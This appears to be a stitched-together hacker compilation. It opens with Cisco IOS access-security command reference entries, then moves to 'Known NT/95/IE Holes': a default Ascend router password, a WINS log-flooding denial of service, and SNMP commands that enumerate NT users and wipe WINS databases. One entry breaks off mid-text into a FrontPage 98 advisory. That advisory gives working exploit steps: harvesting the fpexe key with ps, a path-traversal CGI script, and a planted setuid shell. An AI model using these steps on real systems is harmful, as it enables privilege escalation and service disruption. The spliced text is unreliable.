This command first appeared in Cisco IOS Release 11.1.

This command enables the lock-and-key access feature.

You should always define either an idle timeout (with the timeout keyword in this command) or an absolute timeout (with the timeout keyword in the access-list command). Otherwise, the temporary access list entry will remain, even after the user terminates the session.

Example

The following example causes the software to create a temporary access list entry and tells the software to enable access only for the host from which the Telnet session originated. If the access list entry is not accessed within 2 minutes, it is deleted.

autocommand access-enable host timeout 2

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

access-list (extended) †

autocommand †

[12.7.5] access-template

To manually place a temporary access list entry on a router to which you are connected, use the access-template EXEC command.

access-template [access-list-number | name] [dynamic-name] [source] [destination] [timeout minutes]

Syntax Description

access-list-number Number of the dynamic access list.

name Name of an IP access list. The name cannot contain a space or quotation mark, and must begin with an alphabetic character to avoid ambiguity with numbered access lists.

dynamic-name (Optional) Name of a dynamic access list.

source (Optional) Source address in a dynamic access list. The keywords host and any are allowed. All other attributes are inherited from the original access-list entry.

destination (Optional) Destination address in a dynamic access list. The keywords host and any are allowed. All other attributes are inherited from the original access-list entry.

timeout minutes (Optional) Specifies a maximum time limit for each entry within this dynamic list. This is an absolute time, from creation, that an entry can reside in the list. The default is an infinite time limit and allows an entry to remain permanently.

Command Mode

EXEC

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

This command provides a way to enable the lock-and-key access feature.

You should always define either an idle timeout (with the timeout keyword in this command) or an absolute timeout (with the timeout keyword in the access-list command). Otherwise, the dynamic access list will remain, even after the user has terminated the session.

Example

In the following example, the software enables IP access on incoming packets in which the source address is 172.29.1.129 and the destination address is 192.168.52.12. All other source and destination pairs are discarded.

access-template 101 payroll host 172.29.1.129 host 192.168.52.12 timeout 2

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

access-list (extended) †

autocommand †

clear access-template

[12.7.6] clear access-template

To manually clear a temporary access list entry from a dynamic access list, use the clear access-template EXEC command.

clear access-template [access-list-number | name] [dynamic-name] [source] [destination]

Syntax Description

access-list-number (Optional) Number of the dynamic access list from which the entry is to be deleted.

name Name of an IP access list from which the entry is to be deleted. The name cannot contain a space or quotation mark, and must begin with an alphabetic character to avoid ambiguity with numbered access lists.

dynamic-name (Optional) Name of the dynamic access list from which the entry is to be deleted.

source (Optional) Source address in a temporary access list entry to be deleted.

destination (Optional) Destination address in a temporary access list entry to be deleted.

Command Mode

EXEC

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

This command is related to the lock-and-key access feature. It clears any temporary access list entries that match the parameters you define.

Example

The following example clears any temporary access list entries with a source of 172.20.1.12 from the dynamic access list named vendor:

clear access-template vendor 172.20.1.12

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

access-list (extended) †

access-template

[12.7.7] show ip accounting

To display the active accounting or checkpointed database or to display access-list violations, use the show ip accounting privileged EXEC command.

show ip accounting [checkpoint] [output-packets | access-violations]

Syntax Description

checkpoint (Optional) Indicates that the checkpointed database should be displayed.

output-packets (Optional) Indicates that information pertaining to packets that passed access control and were successfully routed should be displayed. This is the default value if neither output-packets nor access-violations is specified.

access-violations (Optional) Indicates that information pertaining to packets that failed access lists and were not routed should be displayed.

Defaults

If neither the output-packets nor access-violations keyword is specified, show ip accounting displays information pertaining to packets that passed access control and were successfully routed.

Command Mode

EXEC

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

To use this command, you must first enable IP accounting on a per-interface basis.

Sample Displays

Following is sample output from the show ip accounting command:

Router# show ip accounting

Source Destination Packets Bytes

172.30.19.40 172.30.67.20 7 306

172.30.13.55 172.30.67.20 67 2749

172.30.2.50 172.30.33.51 17 1111

172.30.2.50 172.30.2.1 5 319

172.30.2.50 172.30.1.2 463 30991

172.30.19.40 172.30.2.1 4 262

172.30.19.40 172.30.1.2 28 2552

172.30.20.2 172.30.6.100 39 2184

172.30.13.55 172.30.1.2 35 3020

172.30.19.40 172.30.33.51 1986 95091

172.30.2.50 172.30.67.20 233 14908

172.30.13.28 172.30.67.53 390 24817

172.30.13.55 172.30.33.51 214669 9806659

172.30.13.111 172.30.6.23 27739 1126607

172.30.13.44 172.30.33.51 35412 1523980

172.30.7.21 172.30.1.2 11 824

172.30.13.28 172.30.33.2 21 1762

172.30.2.166 172.30.7.130 797 141054

172.30.3.11 172.30.67.53 4 246

172.30.7.21 172.30.33.51 15696 695635

172.30.7.24 172.30.67.20 21 916

172.30.13.111 172.30.10.1 16 1137

Field Description
Source Source address of the packet

Destination Destination address of the packet

Packets Number of packets transmitted from the source address to the destination address

Bytes Number of bytes transmitted from the source address to the destination address

Following is sample output from the show ip accounting access-violations command. (The following displays information pertaining to packets that failed access lists and were not routed.)

Router# show ip accounting access-violations

Source Destination Packets Bytes ACL

172.30.19.40 172.30.67.20 7 306 77

172.30.13.55 172.30.67.20 67 2749 185

172.30.2.50 172.30.33.51 17 1111 140

172.30.2.50 172.30.2.1 5 319 140

172.30.19.40 172.30.2.1 4 262 77

Accounting data age is 41

Field Description

Source Source address of the packet

Destination Destination address of the packet

Packets For accounting keyword, number of packets transmitted from the source address to the destination address

For access-violations keyword, number of packets transmitted from the source address to the destination address that violated the access control list

Bytes For accounting keyword, number of bytes transmitted from the source address to the destination address

For access-violations keyword, number of bytes transmitted from the source address to the destination address that violated the access-control list

ACL Number of the access list of the last packet transmitted from the source to the destination that failed an access list

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

clear ip accounting †

ip accounting †

ip accounting-list †

ip accounting-threshold †

ip accounting-transits †

[12.7.8] Terminal Access Security Commands

This chapter describes the commands used to control access to the router.

enable

To log on to the router at a specified level, use the enable EXEC command.

enable [level]

Syntax Description

level (Optional) Defines the privilege level that a user logs in to on the router.

Default

Level 15

Command Mode

EXEC

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

Note The enable command is associated with privilege level 0. If you configure AAA authorization for a privilege level greater than 0, this command will not be included in the privilege level command set.

Example

In the following example, the user is logging on to privilege level 5 on a router:

enable 5

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

disable †

privilege level (global)

privilege level (line)

[12.7.9] enable password

Use the enable password global configuration command to set a local password to control access to various privilege levels. Use the no form of this command to remove the password requirement.

enable password [level level] {password | encryption-type encrypted-password}

no enable password [level level]

Syntax Description

level level (Optional) Level for which the password applies. You can specify up to 16 privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is not specified in the command or the no form of the command, the privilege level defaults to 15 (traditional enable privileges).

password Password users type to enter enable mode.

encryption-type (Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only encryption type available is 7. If you specify encryption-type, the next argument you supply must be an encrypted password (a password already encrypted by a Cisco router).

encrypted-password Encrypted password you enter, copied from another router configuration.

Default

No password is defined. The default is level 15.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

Use this command with the level option to define a password for a specific privilege level. After you specify the level and the password, give the password to the users who need to access this level. Use the

privilege level (global)

configuration command to specify commands accessible at various levels.

You will not ordinarily enter an encryption type. Typically you enter an encryption type only if you copy and paste into this command a password that has already been encrypted by a Cisco router.

Caution If you specify an encryption type and then enter a cleartext password, you will not be able to reenter enable mode. You cannot recover a lost password that has been encrypted by any method.

If the service password-encryption command is set, the encrypted form of the password you create with the enable password command is displayed when a show startup-config command is entered.

You can enable or disable password encryption with the service password-encryption command.

An enable password is defined as follows:

Must contain from 1 to 25 uppercase and lowercase alphanumeric characters.
Must not have a number as the first character.
Can have leading spaces, but they are ignored. However, intermediate and trailing spaces are recognized.
Can contain the question mark (?) character if you precede the question mark with the key combination Crtl-V when you create the password; for example, to create the password abc?123, do the following:
Enter abc.
Type Crtl-V.
Enter ?123.

When the system prompts you to enter the enable password, you need not precede the question mark with the Ctrl-V; you can simply enter abc?123 at the password prompt.

Examples

In the following example, the password pswd2 is enabled for privilege level 2:

enable password level 2 pswd2

In the following example the encrypted password $1$i5Rkls3LoyxzS8t9, which has been copied from a router configuration file, is set for privilege level 2 using encryption type 7:

enable password level 2 7 $1$i5Rkls3LoyxzS8t9

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

disable †

enable †

enable secret

privilege level (global)

service password-encryption

show privilege

show startup-config †

[12.8.0] enable secret

Use the enable secret global configuration command to specify an additional layer of security over the

enable password

command. Use the no form of the command to turn off the enable secret function.

enable secret [level level] {password | encryption-type encrypted-password}

no enable secret [level level]

Syntax Description

level level (Optional) Level for which the password applies. You can specify up to sixteen privilege levels, using numbers 0 through 15. Level 1 is normal EXEC-mode user privileges. If this argument is not specified in the command or in the no form of the command, the privilege level defaults to 15 (traditional enable privileges). The same holds true for the no form of the command.

password Password users type to enter enable mode. This password should be different from the password created with the enable password command.

encryption-type (Optional) Cisco-proprietary algorithm used to encrypt the password. Currently the only encryption type available for this command is 5 . If you specify encryption-type, the next argument you supply must be an encrypted password (a password encrypted by a Cisco router).

encrypted-password Encrypted password you enter, copied from another router configuration.

Default

No password is defined. The default level is 15.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.0.

Use this command in conjunction with the enable password command to provide an additional layer of security over the enable password. The enable secret command provides better security by storing the enable secret password using a non-reversible cryptographic function. The added layer of security encryption provides is useful in environments where the password crosses the network or is stored on a TFTP server.

You will not ordinarily enter an encryption type. Typically you enter an encryption type only if you paste into this command an encrypted password that you copied from a router configuration file.

Caution If you specify an encryption-type and then enter a cleartext password, you will not be able to reenter enable mode. You cannot recover a lost password that has been encrypted by any method.

If you use the same password for the enable password and enable secret commands, you receive an error message warning that this practice is not recommended, but the password will be accepted. By using the same password, however, you undermine the additional security the enable secret command provides.

Note After you set a password using enable secret command, a password set using the enable password command works only if the enable secret is disabled or an older version of Cisco IOS software is being used, such as when running an older rxboot image. Additionally, you cannot recover a lost password that has been encrypted by any method.

If service password-encryption is set, the encrypted form of the password you create here is displayed when a show startup-config command is entered.

You can enable or disable password encryption with the service password-encryption command.

An enable password is defined as follows:

Must contain from 1 to 25 uppercase and lowercase alphanumeric characters
Must not have a number as the first character
Can have leading spaces, but they are ignored. However, intermediate and trailing spaces are recognized.
Can contain the question mark (?) character if you precede the question mark with the key combination Crtl-V when you create the password; for example, to create the password abc?123, do the following:
Enter abc.
Type Crtl-V.
Enter ?123.

When the system prompts you to enter the enable password, you need not precede the question mark with the Ctrl-V; you can simply enter abc?123 at the password prompt.

Examples

The following example specifies the enable secret password of gobbledegook:

enable secret gobbledegook

After specifying an enable secret password, users must enter this password to gain access. Any passwords set through enable password will no longer work.

Password: gobbledegoo

In the following example the encrypted password $1$FaD0$Xyti5Rkls3LoyxzS8 , which has been copied from a router configuration file, is enabled for privilege level 2 using encryption type 5:

enable password level 2 5 $1$FaD0$Xyti5Rkls3LoyxzS8

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

enable †

enable password

[12.8.1] ip identd

To enable identification support, use the ip identd global configuration command. Use the no form of this command to disable this feature.

ip identd

no ip identd

Syntax Description

This command has no arguments or keywords.

Default

Identification support is not enabled.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 11.1.

The ip identd command returns accurate information about the host TCP port; however, no attempt is made to protect against unauthorized queries.

Example

In the following example, identification support is enabled:

ip identd

[12.8.2] login authentication

To enable TACACS+ authentication for logins, use the login authentication line configuration command. Use the no form of this command to either disable TACACS+ authentication for logins or to return to the default.

no login authentication {default | list-name}

Syntax Description

default Uses the default list created with the aaa authentication login command.

list-name Uses the indicated list created with the aaa authentication login command.

Default

Uses the default set with aaa authentication login.

Command Mode

Line configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

This command is a per-line command used with AAA that specifies the name of a list of TACACS+ authentication methods to try at login. If no list is specified, the default list is used (whether or not it is specified in the command line).

Caution If you use a list-name value that was not configured with the aaa authentication login command, you will disable login on this line.

Entering the no version of login authentication has the same effect as entering the command with the default argument.

Before issuing this command, create a list of authentication processes by using the global configuration aaa authentication login command.

Examples

The following example specifies that the default AAA authentication is to be used on line 4:

line 4

The following example specifies that the AAA authentication list called list1 is to be used on line 7:

line 7

Related Command

aaa authentication login

[12.8.3] privilege level (global)

To set the privilege level for a command, use the privilege level global configuration command. Use the no form of this command to revert to default privileges for a given command.

privilege mode level level command

no privilege mode level level command

Syntax Description

mode Configuration mode. (See the alias command in the Configuration Fundamentals Command Reference for a description of mode.

level Privilege level associated with the specified command. You can specify up to sixteen privilege levels, using numbers 0 through 15.

command Command to which privilege level is associated.

Defaults

Level 15 is the level of access permitted by the enable password.

Level 1 is normal EXEC-mode user privileges.

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

The description of the alias command, in the Configuration Fundametals Command Reference, shows the options for the mode argument in the privilege level global configuration command.

The password for a privilege level defined using the privilege level global configuration command is configured using the

enable password

command.

Level 0 can be used to specify a more-limited subset of commands for specific users or lines. For example, you can allow user "guest" to use only the show users and exit commands.

When you set a command to a privilege level, all commands whose syntax is a subset of that command are also set to that level. For example, if you set the show ip route command to level 15, the show commands and show ip commands are automatically set to privilege level 15---unless you set them individually to different levels.

Example

The commands in the following example set the configure command to privilege level 14 and establish SecretPswd14 as the password users must enter to use level 14 commands.

privilege exec level 14 configure

enable secret level 14 SecretPswd14

Related Commands

enable password

enable secret

privilege level (line)

[12.8.4] privilege level (line)

To set the default privilege level for a line, use the privilege level line configuration command. Use the no form of this command to restore the default user privilege level to the line.

privilege level level

no privilege level

Syntax Description

level Privilege level associated with the specified line.

Defaults

Level 15 is the level of access permitted by the enable password.

Level 1 is normal EXEC-mode user privileges.

Command Mode

Line configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

Users can override the privilege level you set using this command by logging in to the line and enabling a different privilege level. They can lower the privilege level by using the disable command. If users know the password to a higher privilege level, they can use that password to enable the higher privilege level.

You can use level 0 to specify a subset of commands for specific users or lines. For example, you can allow user "guest" to use only the show users and exit commands.

You might specify a high level of privilege for your console line to restrict who uses the line.

Examples

The commands in the following example configure the auxiliary line for privilege level 5. Anyone using the auxiliary line has privilege level 5 by default.

line aux 0

privilege level 5

The command in the following example sets all show ip commands, which includes all show commands, to privilege level 7:

privilege exec level 7 show ip route

This is equivalent to the following command:

privilege exec level 7 show

The commands in the following example set show ip route to level 7 and the show and show ip commands to level 1:

privilege exec level 7 show ip route

privilege exec level 1 show ip

Related Commands

enable password

privilege level (line)

[12.8.5] service password-encryption

To encrypt passwords, use the service password-encryption global configuration command. Use the no form of this command to disable this service.

service password-encryption

no service password-encryption

Syntax Description

This command has no arguments or keywords.

Default

No encryption

Command Mode

Global configuration

Usage Guidelines

This command first appeared in Cisco IOS Release 10.0.

The actual encryption process occurs when the current configuration is written or when a password is configured. Password encryption is applied to all passwords, including authentication key passwords, the privileged command password, console and virtual terminal line access passwords, and BGP neighbor passwords. This command is primarily useful for keeping unauthorized individuals from viewing your password in your configuration file.

When password encryption is enabled, the encrypted form of the passwords is displayed when a show startup-config command is entered. Caution This command does not provide a high level of network security. If you use this command, you should also take additional network security measures.

Note You cannot recover a lost encrypted password. You must clear NVRAM and set a new password.

Example

The following example causes password encryption to take place:

service password-encryption

Related Commands

A dagger (†) indicates that the command is documented outside this chapter.

enable password

key-string †

neighbor password †

[12.8.6] show privilege

To display your current level of privilege, use the show privilege EXEC command.

show privilege

Syntax Description

This command has no arguments or keywords.

Command Mode

EXEC

Usage Guidelines

This command first appeared in Cisco IOS Release 10.3.

Sample Display

The following is sample output from the show privilege command. The current privilege level is 15.

Router# show privilege

Current privilege level is 15

Related Commands

enable password

level

enable secret level

[12.8.7] username

To establish a username-based authentication system, enter the username global configuration command.

username name {nopassword | password password [encryption-type encrypted-password]}

username name password secret

username name [access-class number]

username name [autocommand command]

username name [callback-dialstring telephone-number]

username name [callback-rotary rotary-group-number]

username name [callback-line [tty] line-number [ending-line-number]]

username name [nocallback-verify]

username name [noescape] [nohangup]

username name [privilege level]

Syntax Description

name Host name, server name, user ID, or command name. The name argument can be only one word. White spaces and quotation marks are not allowed.

nopassword No password is required for this user to log in. This is usually most useful in combination with the autocommand keyword.

password Specifies a possibly encrypted password for this username.

password Password a user enters.

encryption-type (Optional) Single-digit number that defines whether the text immediately following is encrypted, and, if so, what type of encryption is used. Currently defined encryption types are 0, which means that the text immediately following is not encrypted, and 7, which means that the text is encrypted using a Cisco-defined encryption algorithm.

encrypted password Encrypted password a user enters.

password (Optional) Password to access the name argument. A password must be from 1 to 25 characters, can contain embedded spaces, and must be the last option specified in the username command.

secret For CHAP authentication: specifies the secret for the local router or the remote device. The secret is encrypted when it is stored on the local router. The secret can consist of any string of up to 11 ASCII characters. There is no limit to the number of username and password combinations that can be specified, allowing any number of remote devices to be authenticated.

access-class (Optional) Specifies an outgoing access list that overrides the access list specified in the access-class line configuration command. It is used for the duration of the user's session.

number Access list number.

autocommand (Optional) Causes the specified command to be issued automatically after the user logs in. When the command is complete, the session is terminated. Because the command can be any length and contain embedded spaces, commands using the autocommand keyword must be the last option on the line.

command The command string. Because the command can be any length and contain embedded spaces, commands using the autocommand keyword must be the last option on the line.

callback-dialstring (Optional) For asynchronous callback only: permits you to specify a telephone number to pass to the DCE device.

telephone-number For asynchronous callback only: telephone number to pass to the DCE device.

callback-rotary (Optional) For asynchronous callback only: permits you to specify a rotary group number. The next available line in the rotary group is selected.

rotary-group-number For asynchronous callback only: integer between 1 and 100 that identifies the group of lines on which you want to enable a specific username for callback.

callback-line (Optional) For asynchronous callback only: specific line on which you enable a specific username for callback.

tty (Optional) For asynchronous callback only: standard asynchronous line.

line-number For asynchronous callback only: relative number of the terminal line (or the first line in a contiguous group) on which you want to enable a specific username for callback. Numbering begins with zero.

ending-line-number (Optional) Relative number of the last line in a contiguous group on which you want to enable a specific username for callback. If you omit the keyword (such as tty), then line-number and ending-line-number are absolute rather than relative line numbers.

nocallback-verify (Optional) Authentication not required for EXEC callback on the specified line.

noescape (Optional) Prevents a user from using an escape character on the host to which that user is connected.

nohangup (Optional) Prevents the security server from disconnecting the user after an automatic command (set up with the autocommand keyword) has completed. Instead, the user gets another login prompt.

privilege (Optional) Sets the privilege level for the user.

level (Optional) Number between 0 and 15 that specifies the privilege level for the user.

Default

None

Command Mode

Global configuration

Usage Guidelines

The following commands first appeared in Cisco IOS Release 10.0:

username name {nopassword | password password [encryption-type encrypted-password]}

username name password secret

username name [access-class number]

username name [autocommand command]

username name [noescape] [nohangup]

username name [privilege level]

The following commands first appeared in Cisco IOS Release 11.1:

username name [callback-dialstring telephone-number]

username name [callback-rotary rotary-group-number]

username name [callback-line [tty] line-number [ending-line-number]]

username name [nocallback-verify]

The username command provides username and/or password authentication for login purposes only. (Note that it does not provide username and/or password authentication for enable mode when the enable use-tacacs command is also configured.)

Multiple username commands can be used to specify options for a single user.

Add a username entry for each remote system that the local router communicates with and requires authentication from. The remote device must have a username entry for the local router. This entry must have the same password as the local router's entry for that remote device.

This command can be useful for defining usernames that get special treatment. For example, you can use this command to define an "info" username that does not require a password, but connects the user to a general purpose information service.

The username command is required as part of the configuration for the Challenge Handshake Authentication Protocol (CHAP). Add a username entry or each remote system the local router requires authentication from.

Note To enable the local router to respond to remote CHAP challenges, one username name entry must be the same as the hostname name entry that has already been assigned to your router.

If there is no secret specified and the debug serial-interface command is enabled, an error is displayed when a link is established and the CHAP challenge is not implemented. CHAP debugging information is available using the debug serial-interface and debug serial-packet commands. For more information about debug commands, refer to the Debug Command Reference.

Examples

To implement a service similar to the UNIX who command, which can be entered at the login prompt and lists the current users of the router, the username command takes the following form:

username who nopassword nohangup autocommand show users

To implement an information service that does not require a password to be used, the command takes the following form:

username info nopassword noescape autocommand telnet nic.ddn.mil

To implement an ID that works even if the TACACS servers all break, the command takes the following form:

username superuser password superpassword

The following example configuration enables CHAP on interface serial 0. It also defines a password for the local server, Adam, and a remote server, Eve.

hostname Adam

interface serial 0

encapsulation ppp

ppp authentication chap

username Adam password oursystem

username Eve password theirsystem

When you look at your configuration file, the passwords will be encrypted and the display will look similar to the following:

hostname Adam

interface serial 0

encapsulation ppp

ppp authentication chap

username Adam password 7 1514040356

username Eve password 7 121F0A18

Related Commands

A dagger (†) indicates that the command is documented outside this chapter. Two daggers (††) indicate that the command is documented in the Debug Command Reference.

arap callback †

callback-forced-wait †

debug callback ††

ppp callback †

[12.8.8] A Word on Ascend Routers

Ascend routers or ok, but they’re not as powerful or as configurable as Cisco. So we will not spend as much time on them. Actually we will not spend any time on them…The only thing we will say is that unless an Administrator changes the password.. the default password on an Ascend is either blank or ascend.

[13.0.0] Known NT/95/IE Holes

[13.0.1] WINS port 84

Found by NeonSurge (rhino9 team)

This is not a critical bug. Its actually more of a nuissance than anything else. If you telnet or stream data to port84 of an NT server, it will cause an error to be recorded in the event long. In some systems, this can cause the hard drive to completely fill up with error messages, causing other applications to fail due to lack of drive space. The flaw will also cause the server to respond extremely slow.

For the telnet attack, simply telnet to the WINS port on an NT server and type on garbage characters, hit enter and it will cause the event log entry.

The same effect was achieved by using an application called pepsi to stream UDP informaiton to the same port.

[13.0.2] WindowsNT and SNMP

Found by Christopher Rouland (from ntsecurity.net)

Christopher writes:

I have found two significant "features" in the SNMP agent implementations under NT 4.0 Server, and I am sure there are more if I feel like really digging. The first issue I sent in earlier this year to Microsoft and received no response other than "expected behavior" and the second I just found and puts any large NT shop at a serious denial of service (DOS) risk.

1. This first exploit demonstrates the ability via SNMP to dump a list of all usernames in an NT domain (assuming the target box is a DC) or on an NT Server.
Here is the simplest NT example I could find to use this:
C:\NTRESKIT>snmputil walk public .1.3.6.1.4.1.77.1.2.25
should be a domain controller or server
2.The second exploit demonstrates the ability via SNMP to delete all of the records in a WINS database remotely, bypassing all NT security. If you understand large scale WINS architecture, you can understand the implications of this. Knowledge of SNMP community strings would allow an attacker to effectively shut down any large NT infrastructure with "N" commands (N=number of WINS servers). This is permitted due to the extensive "cmd" set implemented in the WINS extension agent, specifically:

2. cmdDeleteWins OBJECT-TYPE
SYNTAX IpAddress
ACCESS read-write
STATUS mandatory

urity.net)

The attack was described most adequated by the discoverer:
Change History
Sat Oct 11 1997: Initial posting of web page
Wed Oct 15 1997: Microsoft posted a note responding to the issues raised. I am glad to see that they have plans to release the source of the revised version for review when it is complete. I will update this page with further comments when the fixed version is released.
Wed Oct 22 1997: Microsoft has released a new version of the extensions that claim to fix the security issues. I will comment further on the security of their proposed fix after I have time to review the changes. Check back here in a few days for my comments.
Introduction
The information below talks about using Microsoft's FrontPage 98 extensions with Apache on Unix with Microsoft's mod_frontpage changes. This do not apply to running it on any other server or to running it on Unix without the Microsoft mod_frontpage changes or to running it on Windows NT. There are, however, other security issues on such servers, some of which are similar to those in the FrontPage 97 extensions. I should also note that the Unix server extensions seem to be written in part or completely by Ready-to-Run Software Inc. (RTR) for Microsoft. I will refer to it as Microsoft's product because it is, no matter who wrote it. This discussion is specific to the FrontPage 98 extensions. For more general information on some security problems in earlier versions, some of which are resolved and some of which aren't, see Scott Fritchie's Why I Don't Like Microsoft's FrontPage Web Authoring Tool web page. Parts of it are no longer entirely relevant, but it provides a good background.
It is no secret that the security of the FrontPage 97 and earlier Unix server extensions is quite poor, if Microsoft's instructions are followed. Some of their instructions were quite hilarious when first released, like the suggestion of running your web server as root. It is possible to make them more acceptable--acceptable enough for some sites--but it requires careful work by the administrator.
It had appeared like Microsoft had increased the security of the extensions in the FP98 version available from Microsoft's Web Site. However, a closer examination reveals startling flaws. What they have done is make a small setuid root wrapper that the web server calls. This wrapper than setuid()s to the appropriate user and runs the requested FP CGI as that user. The problem lies in the fact that the wrapper ("fpexe") is written very poorly. while making such a wrapper secure can be difficult, the gaping holes in this program show a complete lack of understanding of security in the Unix environment.
The fpexe program is available for you to inspect yourself. It was originally posted in RTR's FrontPage FAQ. This version is not exactly the same as the one currently distributed (at least it is not the same as the one in the BSD/OS 2.1 kit), but it is close. Both appear to exhibit the same failings.
When I refer to the FP CGI programs, I am referring to the three files normally referenced under the _vti_bin directory: shtml.exe, admin.exe and author.exe.
The key in this discussion is the fact that nothing is stopping anyone from trying to run this fpexe wrapper. If they can trick it into running, they can possible gain privileges they shouldn't.
How It Works
Before you can understand the holes in the FP server extensions, you need to understand what I mean when I talk about the "key". When the Frontpage-modified Apache server starts up, it generates a pseudo-random string of 128 ASCII characters as a key. This key is written to a file that is only readable by the user that starts Apache; normally root. The server than passes the key to fpexe. Since fpexe is setuid root, it can compare the key stored on disk with the one it was passed to be sure they match; if not, it refuses to run. This is used in an attempt to guarantee that the only thing calling fpexe is the web server. Used properly this is a powerful part of possible security precautions. I am not convinced that the generation of the key is cryptographically adequate and it may be subject to intelligent guessing attacks, however I have not looked at it to see. As discussed later, the cryptographical robustness of the key doesn't really matter.
There are a number of problems with the setuid root fpexe program. I am not attempting a complete description of all the problems and their possible consequences and fixes, just making a light sweep over the top. The more obvious problems include:
Return codes from library calls are not properly checked. An example:
f = fopen( buf, "r");
fgets( key, 129, f );
fclose(f);
If fopen() failed (easy to make it do so with ulimit -n), then if your system did not core dump on a fgets() on a closed descriptor you would end up with an empty key. It is obviously easy to guess an empty key. I am not aware of any systems that exhibit this exact problem, but it is possible. Return codes need to be checked, especially in setuid programs.
Proper bounds checking is not done. This leads to obvious buffer overflows. An example:
strcpy( work, FPDIR );
strcat( work, getenv("FPEXE") );
I won't go into the details of what this does, but if you could cause this code to be executed, you could insert your own code on most systems and likely gain access to the UID the program is running as (root). This proves to be an unnecessary effort to go to, because this code is only executed if you have the correct key; if you have the correct key, there are far easier ways to gain access. Buffer overflows are one of the most popular (albeit normally boring) types of new holes in programs being publicized.
It does not clean the environment variables before starting the CGI. Again, this means you can gain access to the UID that the program runs as (not root). If the rest of the program was securely written, this could possibly be an issue however it is of little consequence currently due to the gaping holes in other areas.
It assumes that if you have the key, then you are authorized to have it run any program as nearly any user you tell it to. The process you are running also needs to be in the same process group as the web server; all CGIs run by the server, however, are in the same process group so if you can run a CGI script you can work around the second check. It does no further checks to be sure you are running as a user that should be allowed to run FrontPage CGIs (other than disallowing UID 0; the compiled version also disallows gid 0, however the source version doesn't) or that you are running a Frontpage related program. This means that if you get the key file, you can gain access to any non-root UID on the server. On 99% of boxes, that will give you root. For example, if binaries are owned by bin then become bin and replace one that is run by root from cron. The possibilities are endless once you obtain this level of access.
And, finally, the worst: it passes the key to fpexe via an environment variable! On most systems, environment variables are available via "ps -e". This means that anyone with access to run programs on the system (and there are often more people than you think that are able to do this, due to things such as CGIs) can see it as it is being passed from the web server to fpexe. Recall that once you have the key, there is little remaining before you can get full access to the system.
Demonstration
By now, it should be obvious that there is a serious security problem in the FrontPage 98 server extensions. Here is one demonstration; do not think that this is the only way or that just because you prevent one step of this process from working it is any more difficult to exploit the security holes.
First I have to find the key. This can be done by using ps to get the environment from fpexe. To do this, I first setup a loop running (this assumes a real aka. Bourne shell; if you use the bastard C-shell it obviously won't work as written):
while true; do ps axuwwe -U nobody | grep FPKEY; done
Then I used ZeusBench, a very simple HTTP benchmark program, to generate load on the server:
zb localhost /fp/_vti_bin/shtml.exe -c 50 -t 30
Any method of generating traffic could be used, including a web browser. Since I am using a very inefficient method of looking for a process, I need to generate lots of traffic to increase my chance of finding one. It certainly isn't likely to happen on the first request. The requests do have to be made to a FP CGI script so it will call fpexe.
Before long, I had what I wanted from ps (manually wrapped):
nobody 28008 0.0 0.2 180 76 ?? DN 6:51PM 0:00.01
SCRIPT_URL=/fp/ SCRIPT_URI=http://localhost/fp/ FPUID=1000 FPGID=1000
FPEXE=/_vti_bin/shtml.exe FPKEY=9AF675E332F7583776C241A4795FE387D8E5DC80E77
3FAB70794848FDEFB173FF14CDCDC44F3FAAF144A8C95A81C04BF5FC2B9EFDE3C8DCA1049CD
F760364E59 HTTP_USER_AGENT=ZeusBench/1.0 HTTP_ACCEPT=*/*
PATH=/sbin:/usr/sbin:/bin:/usr/local/bin:/usr/bin:/usr/local/sbin/
SERVER_SOFTWARE=Apache/1.2.5-dev SERVER_NAME=localhost SERVER_PORT=80
REMOTE_HOST=localhost REMOTE_ADDR=127.0.0.1
DOCUMENT_ROOT=/usr/local/etc/httpd/htdocs SERVER_ADMIN=marcs@znep.com
SCRIPT_FILENAME=/usr/local/frontpage/currentversion/apache-fp/_vti_bin/fpexe
REMOTE_PORT=2849 GATEWAY_INTERFACE=CGI/1.1 SERVER_PROTOCOL=HTTP/1.0
REQUEST_METHOD=GET QUERY_STRING= REQUEST_URI=/fp/_vti_bin/shtml.exe
SCRIPT_NAME=/fp/_vti_bin/shtml.exe fpexe
Then I need to use the key to make fpexe think I am the web server. I can't just run this from a normal shell, since I need to be in the same process group as the web server. A simple CGI suffices:
#!/bin/sh
echo Content-type: text/plain
echo
export FPUID=3;
export FPGID=3;
export FPEXE=../../../../../../../../tmp/gotcha;
export FPKEY=9AF675E332F7583776C241A4795FE387D8E5DC80E773FAB70794848FDEFB173
FF14CDCDC44F3FAAF144A8C95A81C04BF5FC2B9EFDE3C8DCA1049CDF760364E59
/usr/local/frontpage/currentversion/apache-fp/_vti_bin/fpexe 2>&1

I need a program for it to run (/tmp/gotcha in this example):
#!/bin/sh
/usr/bin/id
cp /bin/sh /tmp/.mysh
chmod u+s /tmp/.mysh
Then I simply make a HTTP request for the CGI script. I can then run /tmp/.mysh at my leisure to gain access to UID 3 (bin on my system) and do what I want from there.
Stopping the Problem:
Load the new extensions from here. So now you want to fix it. Well. That's the hard part. The only real solution is for someone (either Microsoft or a third party) to do some work to improve the security. It is possible to do this securely. Microsoft hasn't. They have no excuse. This page will be updated when (if?) better fixes become available.
The Apache web server has a suEXEC wrapper designed to allow for a similar thing; that is, execution of CGI scripts under a user's own UID. It is very restrictive (some would say anal) about what it allows: there is a reason for that, as Microsoft's obviously failed attempt at security shows. It is possible that suEXEC could be adapted to function in conjunction with FrontPage, however it will not work without source modifications.
